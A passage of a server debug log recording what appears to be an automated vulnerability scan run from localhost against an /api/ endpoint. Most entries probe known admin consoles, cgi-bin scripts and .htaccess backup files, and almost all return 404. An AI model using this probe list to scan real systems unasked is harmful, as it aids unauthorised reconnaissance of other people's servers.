resCode: 404 +2022-11-01T23:22:11.207Z debug: [1667344931206, duration: 1] GET:/api/juyzqplr.fts?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.209Z debug: [1667344931208, duration: 1] GET:/api/juyzqplr.fts?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.211Z debug: [1667344931211, duration: 0] GET:/api/juyzqplr.jspa?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.215Z debug: [1667344931214, duration: 0] GET:/api/juyzqplr.jspa?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.217Z debug: [1667344931216, duration: 1] GET:/api/juyzqplr.kspx?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.219Z debug: [1667344931219, duration: 0] GET:/api/juyzqplr.kspx?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.222Z debug: [1667344931221, duration: 0] GET:/api/juyzqplr.mscgi?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.225Z debug: [1667344931224, duration: 0] GET:/api/juyzqplr.mscgi?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.227Z debug: [1667344931226, duration: 0] GET:/api/juyzqplr.do?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.229Z debug: [1667344931229, duration: 0] GET:/api/juyzqplr.do?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.231Z debug: [1667344931231, duration: 0] GET:/api/juyzqplr.htm?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.234Z debug: [1667344931234, duration: 0] GET:/api/juyzqplr.htm?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.236Z debug: [1667344931236, duration: 0] GET:/api/juyzqplr.idc?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.238Z debug: [1667344931238, duration: 0] GET:/api/juyzqplr.idc?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.240Z debug: [1667344931240, duration: 0] GET:/api/juyzqplr.x?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.244Z debug: [1667344931244, duration: 0] GET:/api/juyzqplr.x?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.259Z debug: [1667344931258, duration: 1] GET:/api/?, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.275Z debug: [1667344931274, duration: 1] GET:/api/?, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.526Z debug: [1667344931525, duration: 0] GET:/api/ConsoleHelp/default.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.563Z debug: [1667344931561, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.571Z debug: [1667344931569, duration: 1] GET:/api/CFIDE/administrator/settings/version.cfm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.602Z debug: [1667344931600, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.610Z debug: [1667344931609, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.649Z debug: [1667344931647, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.655Z debug: [1667344931655, duration: 0] GET:/api/cmf/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.687Z debug: [1667344931685, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.694Z debug: [1667344931694, duration: 0] GET:/api/clientaccesspolicy.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.725Z debug: [1667344931723, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.732Z debug: [1667344931731, duration: 1] GET:/api/Director, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.740Z debug: [1667344931739, duration: 0] GET:/api/DesktopDirector, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.774Z debug: [1667344931773, duration: 1] GET:/api/citrix/nfuse/default/login.asp?NFuse_LogoutId=&NFuse_MessageType=Error&NFuse_Message=&ClientDetection=ON, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.778Z debug: [1667344931777, duration: 0] GET:/api/citrix/MetaframeXP/default/login.asp?NFuse_LogoutId=&NFuse_MessageType=Error&NFuse_Message=&ClientDetection=ON, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.807Z debug: [1667344931805, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.814Z debug: [1667344931813, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.846Z debug: [1667344931844, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.852Z debug: [1667344931852, duration: 0] GET:/api/vpn/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.892Z debug: [1667344931890, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.901Z debug: [1667344931900, duration: 0] GET:/api/client/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.938Z debug: [1667344931936, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.945Z debug: [1667344931944, duration: 1] GET:/api/login?redirects=10, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.977Z debug: [1667344931976, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.984Z debug: [1667344931984, duration: 0] GET:/api/ControllerWeb/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.026Z debug: [1667344932024, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.034Z debug: [1667344932033, duration: 0] GET:/api/vsmc.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.070Z debug: [1667344932068, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.080Z debug: [1667344932078, duration: 1] GET:/api/app/ui/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.115Z debug: [1667344932113, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.123Z debug: [1667344932122, duration: 1] GET:/api/ui/faces/Login.xhtml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.131Z debug: [1667344932130, duration: 1] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.175Z debug: [1667344932172, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.181Z debug: [1667344932180, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.212Z debug: [1667344932209, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.218Z debug: [1667344932218, duration: 0] GET:/api/system.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.261Z debug: [1667344932259, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.268Z debug: [1667344932267, duration: 0] GET:/api/getxml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.303Z debug: [1667344932300, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.312Z debug: [1667344932310, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.346Z debug: [1667344932344, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.354Z debug: [1667344932353, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.395Z debug: [1667344932393, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.405Z debug: [1667344932404, duration: 1] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.436Z debug: [1667344932434, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.444Z debug: [1667344932443, duration: 1] GET:/api/login?redirects=10, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.478Z debug: [1667344932475, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.486Z debug: [1667344932485, duration: 1] GET:/api/cwhp/CSMSDesktop/about.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.494Z debug: [1667344932493, duration: 1] GET:/api/CSCOnm/servlet/login/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.531Z debug: [1667344932530, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.540Z debug: [1667344932539, duration: 0] GET:/api/authentication/login/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.572Z debug: [1667344932570, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.581Z debug: [1667344932580, duration: 0] GET:/api/lang_pack/EN.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.613Z debug: [1667344932611, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.622Z debug: [1667344932621, duration: 0] GET:/api/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.652Z debug: [1667344932650, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.661Z debug: [1667344932660, duration: 0] GET:/api/CSCOnm/servlet/login/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.697Z debug: [1667344932695, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.707Z debug: [1667344932704, duration: 1] GET:/api/about.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.736Z debug: [1667344932734, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.743Z debug: [1667344932742, duration: 1] GET:/api/admin/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.773Z debug: [1667344932771, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.780Z debug: [1667344932779, duration: 1] GET:/api/restconf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.822Z debug: [1667344932818, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.829Z debug: [1667344932828, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.868Z debug: [1667344932866, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.877Z debug: [1667344932876, duration: 1] GET:/api/login?redirects=10, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.916Z debug: [1667344932914, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.925Z debug: [1667344932923, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.953Z debug: [1667344932951, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.962Z debug: [1667344932961, duration: 1] GET:/api/csamc52/webadmin?page=invalid&type=browser, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:12.992Z debug: [1667344932990, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:12.998Z debug: [1667344932998, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:13.036Z debug: [1667344933034, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.044Z debug: [1667344933043, duration: 1] GET:/api/admin/public/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:13.075Z debug: [1667344933073, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.111Z debug: [1667344933109, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.120Z debug: [1667344933119, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.167Z debug: [1667344933164, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.174Z debug: [1667344933173, duration: 1] GET:/api/nls/ApplicationProperties-en.json, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:13.203Z debug: [1667344933201, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.210Z debug: [1667344933209, duration: 1] GET:/api/securecgi-bin/CSUserCGI.exe?ver, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:13.220Z debug: [1667344933219, duration: 1] GET:/api/securecgi-bin/CSUserCGI.exe?Init+0, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:13.250Z debug: [1667344933248, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.700Z debug: [1667344933697, duration: 1] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:13.760Z debug: [1667344933758, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:13.771Z debug: [1667344933767, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:14.924Z debug: [1667344934922, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:14.931Z debug: [1667344934930, duration: 0] GET:/api/Login.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:14.937Z debug: [1667344934937, duration: 0] GET:/api/admin/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:14.972Z debug: [1667344934970, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:14.979Z debug: [1667344934978, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.021Z debug: [1667344935020, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.029Z debug: [1667344935028, duration: 1] GET:/api/MM/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.086Z debug: [1667344935084, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.094Z debug: [1667344935093, duration: 0] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.125Z debug: [1667344935124, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.134Z debug: [1667344935133, duration: 0] GET:/api/nosuchfile-1977145804-306752655.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.162Z debug: [1667344935161, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.169Z debug: [1667344935168, duration: 1] GET:/api/self_upgrade.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.188Z debug: [1667344935186, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.195Z debug: [1667344935194, duration: 0] GET:/api/webapps/login/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.201Z debug: [1667344935201, duration: 0] GET:/api/webct/about.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.232Z debug: [1667344935231, duration: 1] GET:/api/forum.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.256Z debug: [1667344935254, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.266Z debug: [1667344935265, duration: 1] GET:/api/bitrix/admin/index.php?lang=en, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.296Z debug: [1667344935294, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.318Z debug: [1667344935316, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.325Z debug: [1667344935324, duration: 1] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.350Z debug: [1667344935349, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.356Z debug: [1667344935356, duration: 0] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.386Z debug: [1667344935385, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.393Z debug: [1667344935392, duration: 1] GET:/api/header.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.420Z debug: [1667344935418, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.455Z debug: [1667344935452, duration: 0] GET:/api/.htaccess.old, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.465Z debug: [1667344935464, duration: 0] GET:/api/.htaccess.bak, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.471Z debug: [1667344935470, duration: 1] GET:/api/.htaccess~, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.478Z debug: [1667344935477, duration: 1] GET:/api/.htaccess.copy, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.486Z debug: [1667344935485, duration: 0] GET:/api/.htaccess.tmp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.492Z debug: [1667344935491, duration: 1] GET:/api/..htaccess.swp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.499Z debug: [1667344935498, duration: 0] GET:/api/.htaccess.1, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.505Z debug: [1667344935504, duration: 1] GET:/api/.htaccess.~1~, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.526Z debug: [1667344935524, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.533Z debug: [1667344935532, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.575Z debug: [1667344935572, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.582Z debug: [1667344935581, duration: 1] GET:/api/cgi-bin/kvm.cgi?&file=login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.603Z debug: [1667344935601, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.609Z debug: [1667344935608, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.640Z debug: [1667344935638, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.646Z debug: [1667344935645, duration: 1] GET:/api/snmx-cgi/fxm.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.669Z debug: [1667344935666, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.676Z debug: [1667344935675, duration: 0] GET:/api/sdn/ui/app/index, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.703Z debug: [1667344935701, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.743Z debug: [1667344935741, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.751Z debug: [1667344935750, duration: 0] GET:/api/platform-ui/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.787Z debug: [1667344935785, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.793Z debug: [1667344935792, duration: 1] GET:/api/server-info, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.832Z debug: [1667344935830, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.841Z debug: [1667344935840, duration: 0] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:15.875Z debug: [1667344935873, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.883Z debug: [1667344935881, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.919Z debug: [1667344935917, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.931Z debug: [1667344935929, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.974Z debug: [1667344935972, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:15.982Z debug: [1667344935981, duration: 0] GET:/api/pluto/portal/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:16.015Z debug: [1667344936014, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:16.022Z debug: [1667344936021, duration: 0] GET:/api/nifi/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:16.049Z debug: [1667344936047, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:16.056Z debug: [1667344936055, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:18.717Z debug: [1667344938715, duration: 1] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:18.806Z debug: [1667344938804, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:18.813Z debug: [1667344938812, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:23.739Z debug: [1667344943737, duration: 1] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:23.829Z debug: [1667344943827, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:26.072Z debug: [1667344946069, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:28.764Z debug: [1667344948762, duration: 1] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:33.788Z debug: [1667344953786, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:38.811Z debug: [1667344958810, duration: 0] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:43.832Z debug: [1667344963831, duration: 0] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:48.854Z debug: [1667344968852, duration: 1] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:48.935Z debug: [1667344968932, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:48.948Z debug: [1667344968946, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:53.876Z debug: [1667344973875, duration: 1] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:58.897Z debug: [1667344978896, duration: 1] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:03.919Z debug: [1667344983918, duration: 0] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.006Z debug: [1667344984002, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.013Z debug: [1667344984011, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.042Z debug: [1667344984041, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.050Z debug: [1667344984049, duration: 0] GET:/api/unified-console.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.093Z debug: [1667344984091, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.099Z debug: [1667344984098, duration: 1] GET:/api/login/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.105Z debug: [1667344984105, duration: 0] GET:/api/admin/airflow/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.140Z debug: [1667344984138, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.147Z debug: [1667344984146, duration: 0] GET:/api/api/v1/?format=api, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.177Z debug: [1667344984175, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.184Z debug: [1667344984183, duration: 1] GET:/api/api/v1/?format=api, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.219Z debug: [1667344984218, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.226Z debug: [1667344984224, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.256Z debug: [1667344984253, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.262Z debug: [1667344984261, duration: 1] GET:/api/libs/granite/core/content/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.290Z debug: [1667344984289, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.297Z debug: [1667344984296, duration: 0] GET:/api/system/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.322Z debug: [1667344984320, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.328Z debug: [1667344984327, duration: 1] GET:/api/system/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.361Z debug: [1667344984359, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.370Z debug: [1667344984368, duration: 2] GET:/api/courier/web/1000@/wmLogin.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.404Z debug: [1667344984403, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.424Z debug: [1667344984423, duration: 0] GET:/api/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.440Z debug: [1667344984439, duration: 1] GET:/api/chassis/config/GeneralChassisConfig.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.456Z debug: [1667344984455, duration: 0] GET:/api/this_page_should_not_exist.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:04.483Z debug: [1667344984481, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:04.489Z debug: [1667344984488, duration: 1] GET:/api/qwe/qwe/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:08.940Z debug: [1667344988938, duration: 1] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:13.971Z debug: [1667344993970, duration: 0] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:18.990Z debug: [1667344998989, duration: 0] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:19.565Z debug: [1667344999562, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:19.571Z debug: [1667344999571, duration: 0] GET:/api/axis2/services/CUPMService/ping, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:19.578Z debug: [1667344999577, duration: 1] GET:/api/dfcweb/lib/cupm/nls/applicationproperties.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:19.610Z debug: [1667344999608, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:23:19.619Z debug: [1667344999618, duration: 0] GET:/api/emsam/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:24.008Z debug: [1667345004007, duration: 1] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:29.029Z debug: [1667345009028, duration: 1] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:34.052Z debug: [1667345014051, duration: 0] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:39.074Z debug: [1667345019073, duration: 1] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:44.093Z debug: [1667345024092, duration: 1] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:49.116Z debug: [1667345029115, duration: 0] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:54.138Z debug: [1667345034137, duration: 1] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:23:59.160Z debug: [1667345039159, duration: 1] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:04.182Z debug: [1667345044181, duration: 0] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:09.203Z debug: [1667345049202, duration: 0] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:14.226Z debug: [1667345054225, duration: 1] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:19.244Z debug: [1667345059243, duration: 0] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:24.265Z debug: [1667345064264, duration: 1] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:29.285Z debug: [1667345069284, duration: 1] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:34.306Z debug: [1667345074305, duration: 0] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 